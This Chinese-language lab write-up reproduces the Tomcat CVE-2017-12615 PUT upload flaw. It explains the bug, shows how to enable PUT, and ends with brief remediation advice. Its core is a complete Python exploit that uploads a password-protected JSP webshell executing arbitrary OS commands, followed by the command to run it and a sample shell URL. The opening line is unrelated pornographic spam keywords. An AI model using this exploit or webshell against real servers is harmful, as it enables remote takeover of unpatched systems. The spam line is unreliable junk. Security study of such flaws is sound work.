日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

漏洞原理

Tomcat的Servlet是在conf/web.xml配置的，通過配置文件可知，當后綴名為.jsp和.jspx的時候是通過JspServlet處理請求的,而其他的精通文件是通過DefaultServlet處理的可以得知："1.jsp "(末尾有一個空格)并不能匹配到JspServlet，而是會交由DefaultServlet去處理當處理PUT請求時：會調用resources.bind:dirContext為FileDirContext:調用rebind創建文件又由于windows不允許" "(空格)作為文件名結尾，所以會創建一個".jsp"文件，導致代碼執行

漏洞環境

漏洞靶機 Win 2003x64 ：192.168.136.136
PC主機（Python環境） ：192.168.1.103
漏洞存在范圍：Tomcat-7.0.0-Tomcat-7.0.81

環境搭建

win 2003x64 安裝 JAVA環境

Tomcat7.0.75下載：http://archive.Apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.exe

開啟HTTP PUT

找到Tomcat的安裝目錄下的conf的web.xml

readonly            Is this context "read only", so HTTP
					commands like PUT and DELETE are
					 rejected?  [true]   

這個意思就是說：當前是只讀模式，是不允許修改的

找到org.apache.catalina.servlets.DefaultServlet方法:

添加如下代碼并保存：

<init-param>
	<param-name>readonly</param-name>
    <param-value>false</param-value>
</init-param>

修改完之后，重啟Tomcat：

漏洞復現

Python EXP：

#! -*- coding:utf-8 -*-
 
import httplib
 
import sys
 
import time
 
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.Append(temp
 
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("hacker".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println("Test By Power_Liu");}%>'''
 
try:
 
    conn = httplib.HTTPConnection(sys.argv[1])
 
    conn.request(method='OPTIONS', url='/ffffzz')
 
    headers = dict(conn.getresponse().getheaders())
 
    if 'allow' in headers and 
       headers['allow'].find('PUT') > 0 :
 
        conn.close()
 
        conn = httplib.HTTPConnection(sys.argv[1])
 
        url = "/" + str(int(time.time()))+'.jsp/'
 
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'
 
        conn.request( method='PUT', url= url, body=body)
 
        res = conn.getresponse()
 
        if res.status  == 201 :
 
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]
 
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]
 
        elif res.status == 204 :
 
            print 'file exists'
 
        else:
 
            print 'error'
 
        conn.close()
 
    else:
 
        print 'Server not vulnerable'
 
except Exception,e:
 
    print 'Error:', e

運行Python-EXP腳本：

python2 tomcat-CVE-2017-12615.py 192.168.136.136:8080

得到的shell：http://192.168.136.136:8080/1574766773.jsp

得到一枚Webshell：

訪問：http://192.168.136.136:8080/1574766773.jsp?pwd=hacker&cmd=ipconfig

漏洞修復

將Tomcat更新到該漏洞被修復的版本（例如：Tomcat：8.5.23）readonlyinit-param不應該將false首先設置。如果該參數保留到默認（true），則攻擊者無法上傳文件。最后可以在前端安裝WAF等防護軟件來阻止PUT和DELETE請求。